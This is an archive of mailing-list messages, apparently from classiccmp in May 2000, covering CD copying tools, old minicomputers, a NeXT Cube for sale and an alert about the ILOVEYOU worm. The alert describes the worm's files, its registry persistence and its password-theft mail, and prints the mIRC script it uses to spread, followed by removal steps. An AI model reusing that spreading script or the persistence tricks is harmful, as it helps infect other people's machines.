>To copy an audio CD is more involved, mainly because it's impossible to
>guarantee that you get exactly the right "sectors" in exactly the right
>order from the original (a consequence of the way frames are labelled in
>CD-DA format). Tools like cdparanoia solve that by reading overlapping
>sections, and doing a lot of sliding comparisons to build up an accurate
>copy (it creates a WAV file for every track). That's why simpler methods
>often produce copies that don't sound exactly the same, though some CD-ROM
>readers do a pretty good job at getting a clean audio stream, especially in
>conjuction with software like readcdda or cdda2wav.
I've only used it a few times, but "cdparanoia" is a damn good tool for
what it does. Excellent at reporting error correction levels necessary for
reading the audio CD, too.
Tim.
On May 4, 16:55, Bill Pechter wrote:
> > On May 4, 1:50, Chuck McManis wrote:
> >
> > > I tried to duplicate the bootable VMS 7.1 CD on my Sony CD-R drive
and it
> > > didn't work. (Using Adaptec EZ CD creator's "Clone" facility) So I
> > guessed
> > > it was the block size issue.
I wrote:
> > More likely just a format that EZ CD can't read -- it understands
ISO-9660,
> > RockRidge extensions, and Joliet extensions, but I suspect the VMS CD
(like
> > most Solaris, IRIX, etc) isn't ISO format. If you have access to a
> > unix/linux box, try reading it with 'dd' (that's how I copy Solaris,
Mac
> > HFS, IRIX EFS/XFS, etc).
> I believe the newest Adaptec EZ-CD can't do non-ISO or Audio stuff...
>
> I think that the Linux and Unix stuff can...
>
> Bill
The unix software to write audio CDs normally does so from WAV or AIFF (or
AIFC) files; cdrecord, cdwrite, and WriteCD all do that. (Those are the
only basic writers I know of; software like xcdroast are just frontends to
one of the base writers, usually cdrecord). All of them also handle any
image file; you'd normally use mkisofs to create an ISO-9660 image file
containing whatever you want to write (mkisofs can also include RockRidge
or Joliet extensions, can build TRANS.TBL entries for MESSDOS, and can
create bootable CDs using El Torito); or use mkhybrid to create a hybrid
ISO/HFS filesystem readable on a Mac; or use software like mkefs to create
an IRIX bootable EFS CD.
To copy a data CD, rather than create an image from a bunch of files, the
easiest way is often to use dd. However, on a lot of systems, cdrecord
(and probably cdwrite) can read the CD directly via the O.S.
To copy an audio CD is more involved, mainly because it's impossible to
guarantee that you get exactly the right "sectors" in exactly the right
order from the original (a consequence of the way frames are labelled in
CD-DA format). Tools like cdparanoia solve that by reading overlapping
sections, and doing a lot of sliding comparisons to build up an accurate
copy (it creates a WAV file for every track). That's why simpler methods
often produce copies that don't sound exactly the same, though some CD-ROM
readers do a pretty good job at getting a clean audio stream, especially in
conjuction with software like readcdda or cdda2wav.
--
Pete Peter Turnbull
Dept. of Computer Science
University of York
On May 4, 15:00, allisonp(a)world.std.com wrote:
>
> It's an email worm that takes advantage of MS Active-x controls.
>
> This is a wide spreading fast mover and packs a payload.
>
> Locally several companies have reported it and it was only launched
> less than a day ago.
>
> WWW.f-secure.com has details.
We've already had one hard drive wiped out by it :-(
--
Pete Peter Turnbull
Dept. of Computer Science
University of York
Ah yes, the Cincinatti Milacron. Now that is a truly unusual beast... I'd
bet you could probably find one pretty easily, it would just cost you
something like $10,000 however. The reason being is that Cincinatti Milacron
was formerly known as the Cincinatti Milling Machine Co., and they are known
for their machine tools, I think mostly lathes and the like (lathes for
steel, not wood). At any rate, in about 1970 or '71, they decided to
computerize their milling machines, but they didn't want to use just someone
else's mini (i.e., a PDP-11 for example), so they designed their own. The
first model was not actually designed by them, it was a General Automation I
think, I can't remember. However, all later machines were inhouse designs.
They're all 16-bits, can't remember too much else though. I got this info
out of circa 1968-1973 or so vintage copies of "Datamation".
Will J
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
Greetings.
A lack of space and financial issues are forcing me to part with an
original NeXT Cube system. This is a system that I recently paid Real Money
for, so unfortunately it's not a freebie. I thought I'd give the list first
crack at it. If I don't get any interest in a week, to eBay it goes. I'm
willing to ship it, but that will be very expensive due to weight.
Please email me off-list for full details if interested.
Thanks,
Mark Gregory
gregorym(a)cadvision.com
System specs:
Original NeXT Cube (68030, 400 MB HD, 16 MB RAM)
NeXT 17" MegaPixel monitor
NeXT laser printer
NeXTstep 1.1 on optical disk/NeXTstep 2.1 on HD
All cables, mouse, keyboard, full documentation and several additional
books
NeXTstep/OpenStep upgrade has not been ordered from Apple
All original boxes and inserts.
Price: $350 Canadian (approx. $235 US) + shipping; system is in Calgary,
Alberta
This is what i received from a friend and
I will hereby forward for your benefit
Sipke
Virus Name: VBS/LoveLetter.worm
Aliases: none known
Characteristics:
This worm is a VBS program that is sent attached to an email with the
subject ILOVEYOU.
The mail contains the message "kindly check the attached LOVELETTER
coming from me."
The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs
If the user runs the attachment the worm runs using the Windows
Scripting Host program. This is not normally present on
Windows 95 or Windows NT unless Internet Explorer 5 is installed.
When the worm is first run it drops copies of itself in the following
places :-
C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
C:\WINDOWS\WIN32DLL.VBS
C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS
It also adds the registry keys :-
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL=C:\WINDOWS\Win32DLL.vbs
in order to run the worm at system start-up.
The worm replaces the following files :-
*.JPG
*.JPEG
*.MP3
*.MP2
with copies of itself and it adds the extension .VBS to the original
filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would
contain the worm.
The worm also overwrites the following files :-
*.VBS
*.VBE
*.JS
*.JSE
*.CSS
*.WSH
*.SCT
*.HTA
with copies of itself and renames the files to *.VBS.
The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm
and this is then sent to the IRC channels if
the mIRC client is installed. This is accomplished by the worm replacing
the file SCRIPT.INI with the following script :-
[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
n3=}
After a short delay the worm uses Microsoft Outlook to send copies of
itself to all entries in the address book.
The mails will be of the same format as the original mail.
This worm also has another trick up it's sleeve in that it tries to
download and install an executable file called WIN-BUGSFIX.EXE from the
Internet. This exe file is a password stealing program that will email
any cached passwords
to the mail address MAILME(a)SUPER.NET.PH
In order to facilitate this download the worm sets the start-up page of
Microsoft Internet Explorer to point to the web-page containing the
password stealing trojan.
The email sent by this program is as follows :-
From: goat1(a)192.168.0.2To: mailme(a)super.net.phSubject: Barok...
email.passwords.sender.trojanX-Mailer: Barok...
email.passwords.sender.trojan---by: spyderHost: goat1Username: Goat1IP
Address: 192.168.0.2
RAS Passwords:...
<password information goes here>
...
Cache Passwords:...
<password information goes here>
...
goatserver.goatnet/goatserver.goatnet : GOATNET\goat1:
MAPI : MAPI
The password stealing trojan is also installed via the following
registry key :-
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
to auto run at system start-up.
After it has been run the password stealing trojan copies itself to
WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=Wi
nFAT32.EXE
Date Discovered: Thursday May 4th 2000
DAT included: 4077
Risk: High
> How to disinfect : Virus "I LOVE YOU"
> >
> > 1/ Kill all process called "wscript.exe" from the Windows NT
> > TaskManager or
> > from the running applications taskbar.
> >
> > 2/ Execute the "regedit" program from "Start" menu/"Run..."
> > 3/ Using this program, go in
> > "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" and
> > remove the entry containing MSKernel32.vbs
> > 4/ Do the same with
> > "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
> > RunServices"
> > and Win32DLL.vbs
> >
> > 5/ Go in "HKEY_CURRENT_USER\Software\Microsoft\Internet
> > Explorer\Main" and
> > change the value of "Start Page" to "about:blank"
> >
> > 6/ The virus also infects files on network drives by writing the virus
> > script in files with those extensions: vbs, vbe, js, jse,
> > css, wsh, sct,
> > hta, jpeg, jpg, mp3, mp2. You can check this by making a
> > "Find" on every
> > network drive, looking for the string "loveletter" (in the
> > field "Containing
> > text:").
> >
> > Look in your sent items to check to who you sent the virus.
> >
It can be destructive but apparently it's easy to stop it before it does that.
That and the files it deletes are mostly images and sounds. I believe it
needs to get the downloaded win-bugsfix.exe file and that server/source
is unreachable. It's bad as it represents another possble way to compromize
MS based systems that are ubiquious. To any other system or a tightend
MS one it's noise.
Well read up on it as it takes advantage of all the cute little widgets of IE5.0
namely instant messaging, Chat and Active-x controls. Once on the system
it uses the outlook/outlookexpress addressbook to send itself to friends
and contacts. so if it get to insystem in the average company within minutes
every one there has it and it will cascade.
If you don't have IE 5.0 or outlook (office87/98 or 2000) your safer. Even
when you install IE4.0/sp1 you can kill off some of the toys and make it
much harder to infect.
The problem is not so much crappy MS as its peoples affliction for
toys and not tools. That and W95/98 are very bad for security and
win2000 and NT run close if not set up right. W9x effectively has
no security and if the user is SHARING folders/files on the local net
and using a modem to access the internet that system makes a
fine proxy. If you admin uses some sense and takes advantage of
even w9x security and policy stuff you can be far more resistant to
much of the junk.
Allison
-----Original Message-----
From: Steve Robertson <steverob(a)hotoffice.com>
To: classiccmp(a)classiccmp.org <classiccmp(a)classiccmp.org>
Date: Thursday, May 04, 2000 4:24 PM
Subject: RE: Watch for "ILOVEYOU" loveletter.VBS bug
It's certainly spreading fast, I've already received three corrupt messages. Two of them came from other list servers (not this one) that I belong to and one came from a friend.
Fortunately, I don't think this one is too distructive...
Steve Robertson <steverob(a)hotoffice.com>
> It's an email worm that takes advantage of MS Active-x controls.
>
> This is a wide spreading fast mover and packs a payload.
>
> Locally several companies have reported it and it was only launched
> less than a day ago.
>
> WWW.f-secure.com has details.
>
> Allison
>
You can use outlook express if you do one thing before going on line...
Go to TOOLS|options and hit the first item on the READ tab.
That oen enables read(aka open) message after usually 10-15seconds.
UNCHECK the box, then you can read you mail and if loveletter pops up
you can safely delete it (also make sure it's deleted from the deleted
items folder too).
If you have outlook it's basically the same spiel but I never install it as
its
fat and usually not used for more than reading mail.
Half the users run Netscape (3.01 gold or 4.72) and that is totally immune.
Allison
-----Original Message-----
From: Stan Sieler <ss(a)allegro.com>
To: classiccmp(a)classiccmp.org <classiccmp(a)classiccmp.org>
Date: Thursday, May 04, 2000 6:31 PM
Subject: Re: Watch for "ILOVEYOU" loveletter.VBS bug
Re:
> > It's an email worm that takes advantage of MS Active-x controls.
> We've already had one hard drive wiped out by it :-(
I had to explain to several people here why I wasn't worried :)
In the radio/TV reports I've heard about it, I've
yet to hear any "expert" explain the simplest method
of avoiding this (and similar) viruses:
Don't use a mailer that's going to be executing any incoming code.
So, two of us here (Pegasus users) are happy, while the
MS Outlook users here are paranoid :)
If you're curious about Pegasus (a Win95/98/NT mail client),
check out www.pegasus.usa.com ... it's free.
Personally, I prefer to use elm ... and usually do for most of
my important mail. I like being able to say that
I use a "steam-powered mail program".
Stan Sieler sieler(a)allegro.com
www.allegro.com/sieler/wanted/index.htmlwww.allegro.com/sieler